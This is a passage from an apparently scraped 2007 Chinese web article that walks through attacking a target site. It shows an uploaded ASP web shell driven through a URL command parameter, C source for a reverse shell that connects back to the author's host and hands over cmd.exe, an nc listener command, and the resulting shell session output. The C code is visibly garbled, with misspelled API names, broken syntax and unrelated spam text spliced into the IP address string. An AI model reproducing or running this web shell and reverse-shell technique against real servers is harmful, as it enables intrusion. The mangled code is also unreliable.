This Domain(Admin5.com) is for Sale:

内网建网站服务_器的安全问题

时间:2007-10-27  来源:不详  作者:林仙

  然后再提交请求:
  http://www.target.com/bbs/uploadimages/ 
  439587438739.asp?cmd=ping2.168.0.1
  呵呵,我们的防火墙有反应了。来自www.target.com的icmp数据包被记录。看来没有问题了,通过这个ASP我们可以执行很多命令(第五大失败),都是system权限,只不过没有回显,不是很完美。于是想得到一个交互式的she1l。写个反连的程序吧:
  #include
  #include
  #pragmacomment(lib."ws2_32")
  voidmain(intargc,char*argv[])
  {
  WSADATAwsaData;
  SOCKEThSocket;
  STARTUPINFOsi;
  PROCESS_INFORMATIONpi;
  structsockaddr_inadik_sin;
  memset(&adik_sin,0,sizeof(adik_sin));
  memset(&si,0,sizeof(si));
  WSAStartuup(MAKEWORD(2,0),&WSAdATA);
  hSocket=WSASocket(AF_INET,
  SOCK_STREMA,NULL,NULL,NULL,NULL);
  adik_sin.sin_family=AF_INET;
  adik_sin.sin_port=htons(53);//连接到我的主机53端口
  adik_sin.sin_addr.s_addr=inet_addr("192. 织梦好,好织梦
  168.0.1:);//我的主机的IP
  connect(hSocket.(structsockaddr*)璱k_sin,
  sizeof(adik_sin);
  si.cb=sizeof(si)
  si.dwFlags-STARTF_USESTDHANDLES;
  si.hStdlnput=si.hStdOutput=si.hStdError
  =(void*)hSocket;
  CreateProcess(NULL."cmd.exe",NULL,
  NULL,1,NULL,NULL,NULL,&si.&pi);
  ExitProcess(0);
  }
  编译成a.exe然后上传上去先在本机用nc监听一个端口53,然后在IE里执行:
  http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe
  D:\nc-1-p53
  MicrosoftWindows2000[Version5.00.2195]
  版权所有1985-2000MicrosoftCorp:
  D:\inetpub\wwwroot\bbs\uploadimages>ipconfig
  windows2000IPConfiguration
  Ethernetadapter本地连接:
  Connection-specificDNSSuffix.:
  IPAddress..............:192.168.1.222
  SubnetMask.............:255.255.255.0
标签云:问题 安全 服务 网站 这个 一个 程序 可以 我们 权限

看完这篇,您有何感觉呢?

文章评论

共有位Admini5网友发表了评论 查看完整内容

推荐信息

24小时热门信息

最新信息